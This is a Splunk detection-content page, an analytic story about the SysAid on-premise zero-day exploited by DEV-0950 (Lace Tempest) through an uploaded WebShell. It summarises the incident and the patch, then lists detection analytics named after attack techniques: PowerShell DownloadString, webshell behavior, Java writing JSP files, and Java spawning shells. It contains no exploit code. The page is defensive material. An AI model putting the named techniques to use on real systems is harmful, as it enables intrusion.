Try in Splunk Security Cloud

Description

A zero-day vulnerability was discovered in SysAid’s on-premise software, exploited by the group DEV-0950 (Lace Tempest). The attackers uploaded a WebShell and other payloads, gaining unauthorized access and control. SysAid has released a patch (version 23.3.36) to remediate the vulnerability and urges customers to conduct a comprehensive compromise assessment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2023-11-09
  • Author: Michael Haag, Splunk
  • ID: 228f22cb-3436-4c31-8af4-370d40af7b49

Narrative

The analytics tagged to this analytic story will aid in capturing initial access and some post-exploitation activities. In addition to the application spawning a shell, consider reviewing STRT’s Cobalt Strike and PowerShell script block logging analytic stories. On November 2nd, SysAid’s security team identified a potential vulnerability in their on-premise software. The investigation revealed a zero-day vulnerability exploited by the group known as DEV-0950 (Lace Tempest). The attackers uploaded a WebShell and other payloads into the webroot of the SysAid Tomcat web service, thereby gaining unauthorized access and control over the affected system. SysAid promptly initiated their incident response protocol and began proactive communication with their on-premise customers to implement a mitigation solution. SysAid has released a patch (version 23.3.36) to remediate the vulnerability and strongly recommends all customers to conduct a comprehensive compromise assessment of their network.

Detections

Name Technique Type
Any Powershell DownloadString Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer TTP
Detect Webshell Exploit Behavior Server Software Component, Web Shell TTP
Java Writing JSP File Exploit Public-Facing Application, External Remote Services TTP
Windows Java Spawning Shells Exploit Public-Facing Application, External Remote Services TTP

Reference

source | version: 1